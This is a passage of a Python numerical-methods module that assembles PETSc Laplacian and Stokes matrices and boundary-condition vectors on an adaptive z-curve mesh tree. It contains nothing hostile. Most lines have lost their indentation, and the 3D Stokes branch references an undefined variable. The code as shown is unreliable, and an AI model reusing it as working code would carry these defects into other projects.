complete the computation of the spatial operator on the meshes located at the
boundary of the domain. We assume that the type and the values of the variable
at the boundary do not change with time, so this array is built from the type
of boundary condition applied to the computed variable and its values at the
north, south, east, west, front and back boundaries.

...
...
"""
import petsc4py.PETSc as petsc
from six.moves import range
import config as cfg
from mrpy.mr_utils import mesh
from mrpy.mr_utils import op
import numpy as np
import math
import importlib
from .matrix_aux import matrix_add
#!!!!!!! TODO: remember to add an mr_bc_scalar !!!!!!!!
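
# A minimal usage sketch, assuming a mesh tree `tree` built elsewhere with
# tree.bc = (bc_type, (north, south, west, east, front, back)) and a PETSc
# vector `u` of size tree.number_of_leaves (all names are illustrative):
#
#     lap = create_matrix(tree, axis=0)  # `axis` is accepted but unused here
#     bc = create_bc_scalar(tree, axis=0)
#     out = u.duplicate()
#     lap.mult(u, out)    # interior part of the discrete laplacian
#     out.axpy(1.0, bc)   # boundary-condition contribution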


def create_matrix(tree, axis):
matrix = petsc.Mat().create()
number_of_rows = tree.number_of_leaves
size_row = (number_of_rows, number_of_rows)
size_col = (number_of_rows, number_of_rows)
matrix.setSizes((size_row, size_col))
matrix.setUp()
boundary_conditions = tree.bc[0]
# matrix = np.zeros(shape=(number_of_rows, number_of_rows), dtype=np.float)
if tree.dimension == 2:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
level = tree.nlevel[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i-1, j, k)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dy)/(dx), level, i, j, k)
matrix_add(tree, matrix, row, (dy)/(dx), level, i_left, j_left, k_left)
else:
for n in range(2):
matrix_add(tree, matrix, row, -(dy/2.)/((dx/2.)), level+1, 2*i, 2*j+n, 2*k)
matrix_add(tree, matrix, row, (dy/2.)/((dx/2.)), level+1, 2*i_left+1, 2*j+n, 2*k)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dy)/(dx), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i+1, j, k)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree, matrix, row, -dy/(dx), level, i, j, k)
matrix_add(tree, matrix, row, dy/(dx), level, i_right, j_right, k_right)
else:
for n in range(2):
matrix_add(tree, matrix, row, -(dy/2.)/((dx/2.)), level+1, 2*i+1, 2*j+n, 2*k)
matrix_add(tree, matrix, row, (dy/2.)/((dx/2.)), level+1, 2*i_right, 2*j+n, 2*k)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dy)/(dx), level, i, j, k)
elif boundary_conditions == "neumann":
                #the right flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i, j-1, k)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dx)/(dy), level, i, j, k)
matrix_add(tree, matrix, row, (dx)/(dy), level, i_left, j_left, k_left)
else:
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)/((dy/2.)), level+1, 2*i+m, 2*j, 2*k)
matrix_add(tree, matrix, row, (dx/2.)/((dy/2.)), level+1, 2*i+m, 2*j_left+1, 2*k)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx)/(dy), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i, j+1, k)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree, matrix, row, -dx/(dy), level, i, j, k)
matrix_add(tree, matrix, row, dx/(dy), level, i_right, j_right, k_right)
else:
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)/((dy/2.)), level+1, 2*i+m, 2*j+1, 2*k)
matrix_add(tree, matrix, row, (dx/2.)/((dy/2.)), level+1, 2*i+m, 2*j_right, 2*k)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx)/(dy), level, i, j, k)
elif boundary_conditions == "neumann":
                #the right flux depends only on the boundary condition scalar
pass
matrix.assemble()
return matrix
if tree.dimension == 3:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
level = tree.nlevel[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i-1, j, k)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dy*dz)/(dx), level, i, j, k)
matrix_add(tree, matrix, row, (dy*dz)/(dx), level, i_left, j_left, k_left)
else:
for o in range(2):
for n in range(2):
matrix_add(tree, matrix, row, -((dy/2.)*(dz/2.))/((dx/2)), level+1, 2*i, 2*j+n, 2*k+o)
matrix_add(tree, matrix, row, ((dy/2.)*(dz/2.))/((dx/2)), level+1, 2*i_left+1, 2*j+n, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dy*dz)/(dx), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i+1, j, k)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree, matrix, row, -dy*dz/(dx), level, i, j, k)
matrix_add(tree, matrix, row, dy*dz/(dx), level, i_right, j_right, k_right)
else:
for o in range(2):
for n in range(2):
matrix_add(tree, matrix, row, -(dy/2.)*(dz/2.)/((dx/2.)), level+1, 2*i+1, 2*j+n, 2*k+o)
matrix_add(tree, matrix, row, (dy/2)*(dz/2.)/((dx/2.)), level+1, 2*i_right, 2*j+n, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dy*dz)/(dx), level, i, j, k)
elif boundary_conditions == "neumann":
                #the right flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i, j-1, k)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dx*dz)/(dy), level, i, j, k)
matrix_add(tree, matrix, row, (dx*dz)/(dy), level, i_left, j_left, k_left)
else:
for o in range(2):
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)*(dz/2.)/((dy/2.)), level+1, 2*i+m, 2*j, 2*k+o)
matrix_add(tree, matrix, row, (dx/2.)*(dz/2.)/((dy/2.)), level+1, 2*i+m, 2*j_left+1, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx*dz)/(dy), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i, j+1, k)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree, matrix, row, -dx*dz/(dy), level, i, j, k)
matrix_add(tree, matrix, row, dx*dz/(dy), level, i_right, j_right, k_right)
else:
for o in range(2):
for m in range(2):
                            matrix_add(tree, matrix, row, -(dx/2.)*(dz/2.)/((dy/2.)), level+1, 2*i+m, 2*j+1, 2*k+o)
matrix_add(tree, matrix, row, (dx/2.)*(dz/2.)/((dy/2.)), level+1, 2*i+m, 2*j_right, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx*dz)/(dy), level, i, j, k)
elif boundary_conditions == "neumann":
                #the right flux depends only on the boundary condition scalar
pass
# left flux for axis 2
if mesh.bc_compatible_local_indexes(tree, level, i, j, k-1) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree, level, i, j, k-1)
index_left = mesh.z_curve_index(tree.dimension, level, i_left, j_left, k_left)
if index_left in tree.tree_nodes and tree.nisleaf[index_left] \
or index_left not in tree.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree, matrix, row, -(dx*dy)/(dz), level, i, j, k)
matrix_add(tree, matrix, row, (dx*dy)/(dz), level, i_left, j_left, k_left)
else:
for n in range(2):
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)*(dy/2.)/((dz/2.)), level+1, 2*i+m, 2*j+n, 2*k)
matrix_add(tree, matrix, row, (dx/2.)*(dy/2.)/((dz/2.)), level+1, 2*i+m, 2*j+n, 2*k_left+1)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx*dy)/(dz), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 2
if mesh.bc_compatible_local_indexes(tree, level, i, j, k+1) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree, level, i, j, k+1)
index_right = mesh.z_curve_index(tree.dimension, level, i_right, j_right, k_right)
if index_right in tree.tree_nodes and tree.nisleaf[index_right] \
or index_right not in tree.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree, matrix, row, -(dx*dy)/(dz), level, i, j, k)
matrix_add(tree, matrix, row, (dx*dy)/(dz), level, i_right, j_right, k_right)
else:
for n in range(2):
for m in range(2):
matrix_add(tree, matrix, row, -(dx/2.)*(dy/2.)/((dz/2.)), level+1, 2*i+m, 2*j+n, 2*k+1)
matrix_add(tree, matrix, row, (dx/2.)*(dy/2.)/((dz/2.)), level+1, 2*i+m, 2*j+n, 2*k_right)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree, matrix, row, -2*(dx*dy)/(dz), level, i, j, k)
elif boundary_conditions == "neumann":
                #the right flux depends only on the boundary condition scalar
pass
matrix.assemble()
return matrix
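
# Note on refinement interfaces: the face flux is always evaluated on the
# finer side. In 2D, a left face shared with two level-(L+1) neighbours is
# split into two half-faces of size dy/2, each differenced over dx/2, which
# is what the `for n in range(2)` branches above encode.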


def create_bc_scalar(tree, axis, north=None, south=None, east=None, west=None, front=None, back=None):
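    # Returns the right-hand-side contribution of the boundary conditions:
    # each boundary leaf receives the part of its face flux that the matrix
    # stencil cannot express. For periodic conditions the vector stays zero.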
scalar = petsc.Vec().create()
number_of_rows = tree.number_of_leaves
scalar.setSizes(number_of_rows, number_of_rows)
scalar.setUp()
boundary_conditions = tree.bc[0]
if north is None and south is None and east is None and west is None and front is None and back is None:
north=tree.bc[1][0]
south=tree.bc[1][1]
west=tree.bc[1][2]
east=tree.bc[1][3]
front=tree.bc[1][4]
back=tree.bc[1][5]
if boundary_conditions == "periodic":
return scalar
elif boundary_conditions == "dirichlet":
if tree.dimension == 2:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
level = tree.nlevel[index]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
#left flux
if i == 0:
scalar.setValue(row, 2*west*dy/(dx*(dx*dy)), True)
if j == 0:
scalar.setValue(row, 2*south*dx/(dy*(dx*dy)), True)
#right flux
if i == 2**level-1:
scalar.setValue(row, 2*east*dy/(dx*(dx*dy)), True)
if j == 2**level-1:
scalar.setValue(row, 2*north*dx/(dy*(dx*dy)), True)
return scalar
elif tree.dimension == 3:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
level = tree.nlevel[index]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
#left flux
if i == 0:
scalar.setValue(row, 2*west*dy*dz/(dx*(dx*dy*dz)), True)
if j == 0:
scalar.setValue(row, 2*south*dx*dz/(dy*(dx*dy*dz)), True)
if k == 0:
scalar.setValue(row, 2*back*dx*dy/(dz*(dx*dy*dz)), True)
#right flux
if i == 2**level-1:
scalar.setValue(row, 2*east*dy*dz/(dx*(dx*dy*dz)), True)
if j == 2**level-1:
scalar.setValue(row, 2*north*dx*dz/(dy*(dx*dy*dz)), True)
                if k == 2**level-1:
scalar.setValue(row, 2*front*dx*dy/(dz*(dx*dy*dz)), True)
return scalar
elif boundary_conditions == "neumann":
if tree.dimension == 2:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
level = tree.nlevel[index]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
#left flux
if i == 0:
scalar.setValue(row, west*dy/(dx*dy), True)
if j == 0:
scalar.setValue(row, south*dx/(dx*dy), True)
#right flux
if i == 2**level-1:
scalar.setValue(row, east*dy/(dx*dy), True)
if j == 2**level-1:
scalar.setValue(row, north*dx/(dx*dy), True)
return scalar
elif tree.dimension == 3:
for row in range(number_of_rows):
index = tree.tree_leaves[row]
level = tree.nlevel[index]
i = tree.nindex_x[index]
j = tree.nindex_y[index]
k = tree.nindex_z[index]
dx = tree.ndx[index]
dy = tree.ndy[index]
dz = tree.ndz[index]
#left flux
if i == 0:
scalar.setValue(row, west*dy*dz/(dx*dy*dz), True)
if j == 0:
scalar.setValue(row, south*dx*dz/(dx*dy*dz), True)
if k == 0:
scalar.setValue(row, back*dx*dy/(dx*dy*dz), True)
#right flux
if i == 2**level-1:
scalar.setValue(row, east*dy*dz/(dx*dy*dz), True)
if j == 2**level-1:
scalar.setValue(row, north*dx*dz/(dx*dy*dz), True)
if k == 2**level-1:
scalar.setValue(row, front*dx*dy/(dx*dy*dz), True)
return scalar
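
# The Dirichlet factors of 2 above come from the one-sided difference to the
# face midpoint: with the boundary value u_b enforced on the face, the
# gradient in the first cell layer is (u_in - u_b) / (dx / 2).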


def create_stokes_part_matrix(tree_x=None, tree_y=None, tree_z=None):
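    # Assembles the block-diagonal laplacian (viscous) part of the Stokes
    # operator: rows [0, N) act on the x-velocity and rows [N, 2*N) on the
    # y-velocity (and [2*N, 3*N) on the z-velocity in 3D), N being the
    # number of leaves.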
matrix = petsc.Mat().create()
if cfg.dimension == 2:
number_of_rows = tree_x.number_of_leaves
boundary_conditions_x = cfg.bc_dict[tree_x.tag][0]
boundary_conditions_y = cfg.bc_dict[tree_y.tag][0]
size_row = (cfg.dimension*number_of_rows, cfg.dimension*number_of_rows)
size_col = (cfg.dimension*number_of_rows, cfg.dimension*number_of_rows)
matrix.setSizes((size_row, size_col))
matrix.setUp()
# matrix = np.zeros(shape=(number_of_rows, number_of_rows), dtype=np.float)
# x-component
for row in range(number_of_rows):
index = tree_x.tree_leaves[row]
i = tree_x.nindex_x[index]
j = tree_x.nindex_y[index]
k = tree_x.nindex_z[index]
level = tree_x.nlevel[index]
dx = tree_x.ndx[index]
dy = tree_x.ndy[index]
dz = tree_x.ndz[index]
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_x, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dy)/(dx*(dx*dy)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dy)/(dx*(dx*dy)), level, i_left, j_left, k_left)
else:
for n in range(2):
matrix_add(tree_x, matrix, row, -(dy/2)/((dx/2)*(dx*dy)), level+1, 2*i, 2*j+n, 2*k)
matrix_add(tree_x, matrix, row, (dy/2)/((dx/2)*(dx*dy)), level+1, 2*i_left+1, 2*j+n, 2*k)
elif boundary_conditions_x == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dy)/(dx*(dx*dy)), level, i, j, k)
elif boundary_conditions_x == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_x, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -dy/(dx*(dx*dy)), level, i, j, k)
matrix_add(tree_x, matrix, row, dy/(dx*(dx*dy)), level, i_right, j_right, k_right)
else:
for n in range(2):
matrix_add(tree_x, matrix, row, -(dy/2)/((dx/2)*(dx*dy)), level+1, 2*i+1, 2*j+n, 2*k)
matrix_add(tree_x, matrix, row, (dy/2)/((dx/2)*(dx*dy)), level+1, 2*i_right, 2*j+n, 2*k)
elif boundary_conditions_x == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dy)/(dx*(dx*dy)), level, i, j, k)
elif boundary_conditions_x == "neumann":
                #the right flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_x, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dx)/(dy*(dx*dy)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dx)/(dy*(dx*dy)), level, i_left, j_left, k_left)
else:
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j, 2*k)
matrix_add(tree_x, matrix, row, (dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j_left+1, 2*k)
elif boundary_conditions_x == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx)/(dy*(dx*dy)), level, i, j, k)
elif boundary_conditions_x == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_x, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -dx/(dy*(dx*dy)), level, i, j, k)
matrix_add(tree_x, matrix, row, dx/(dy*(dx*dy)), level, i_right, j_right, k_right)
else:
for m in range(2):
matrix_add(tree_x, matrix, row, -(dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j+1, 2*k)
matrix_add(tree_x, matrix, row, (dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j_right, 2*k)
elif boundary_conditions_x == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dx)/(dy*(dx*dy)), level, i, j, k)
elif boundary_conditions_x == "neumann":
                #the right flux depends only on the boundary condition scalar
pass
# y-component
for row in range(number_of_rows):
index = tree_y.tree_leaves[row]
i = tree_y.nindex_x[index]
j = tree_y.nindex_y[index]
k = tree_y.nindex_z[index]
level = tree_y.nlevel[index]
dx = tree_y.ndx[index]
dy = tree_y.ndy[index]
dz = tree_y.ndz[index]
row_y = row + number_of_rows
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_y, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dy)/(dx*(dx*dy)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dy)/(dx*(dx*dy)), level, i_left, j_left, k_left, number_of_rows)
else:
for n in range(2):
matrix_add(tree_y, matrix, row_y, -(dy/2)/((dx/2)*(dx*dy)), level+1, 2*i, 2*j+n, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dy/2)/((dx/2)*(dx*dy)), level+1, 2*i_left+1, 2*j+n, 2*k, number_of_rows)
elif boundary_conditions_y == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dy)/(dx*(dx*dy)), level, i, j, k, number_of_rows)
elif boundary_conditions_y == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_y, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -dy/(dx*(dx*dy)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, dy/(dx*(dx*dy)), level, i_right, j_right, k_right, number_of_rows)
else:
for n in range(2):
matrix_add(tree_y, matrix, row_y, -(dy/2)/((dx/2)*(dx*dy)), level+1, 2*i+1, 2*j+n, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dy/2)/((dx/2)*(dx*dy)), level+1, 2*i_right, 2*j+n, 2*k, number_of_rows)
elif boundary_conditions_y == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dy)/(dx*(dx*dy)), level, i, j, k, number_of_rows)
elif boundary_conditions_y == "neumann":
                #the right flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_y, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dx)/(dy*(dx*dy)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx)/(dy*(dx*dy)), level, i_left, j_left, k_left, number_of_rows)
else:
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j_left+1, 2*k, number_of_rows)
elif boundary_conditions_y == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx)/(dy*(dx*dy)), level, i, j, k, number_of_rows)
elif boundary_conditions_y == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_y, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -dx/(dy*(dx*dy)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, dx/(dy*(dx*dy)), level, i_right, j_right, k_right, number_of_rows)
else:
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j+1, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)/((dy/2)*(dx*dy)), level+1, 2*i+m, 2*j_right, 2*k, number_of_rows)
elif boundary_conditions_y == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx)/(dy*(dx*dy)), level, i, j, k, number_of_rows)
elif boundary_conditions_y == "neumann":
                #the right flux depends only on the boundary condition scalar
pass
matrix.assemble()
return matrix
if cfg.dimension == 3:
number_of_rows = tree_x.number_of_leaves
boundary_conditions_x = cfg.bc_dict[tree_x.tag][0]
boundary_conditions_y = cfg.bc_dict[tree_y.tag][0]
boundary_conditions_z = cfg.bc_dict[tree_z.tag][0]
size_row = (cfg.dimension*number_of_rows, cfg.dimension*number_of_rows)
size_col = (cfg.dimension*number_of_rows, cfg.dimension*number_of_rows)
matrix.setSizes((size_row, size_col))
matrix.setUp()
# matrix = np.zeros(shape=(number_of_rows, number_of_rows), dtype=np.float)
# x-component
for row in range(number_of_rows):
index = tree_x.tree_leaves[row]
i = tree_x.nindex_x[index]
j = tree_x.nindex_y[index]
k = tree_x.nindex_z[index]
level = tree_x.nlevel[index]
dx = tree_x.ndx[index]
dy = tree_x.ndy[index]
dz = tree_x.ndz[index]
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_x, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_x, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_x.dimension, level, i_left, j_left, k_left)
if index_left in tree_x.tree_nodes and tree_x.nisleaf[index_left] \
or index_left not in tree_x.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_x, matrix, row, -(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k)
matrix_add(tree_x, matrix, row, (dy*dz)/(dx*(dx*dy*dz)), level, i_left, j_left, k_left)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_x, matrix, row, -((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i, 2*j+n, 2*k+o)
matrix_add(tree_x, matrix, row, ((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i_left+1, 2*j+n, 2*k+o)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_x, matrix, row, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_x, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_x, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_x.dimension, level, i_right, j_right, k_right)
if index_right in tree_x.tree_nodes and tree_x.nisleaf[index_right] \
or index_right not in tree_x.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_x, matrix, row, -dy*dz/(dx*(dx*dy*dz)), level, i, j, k)
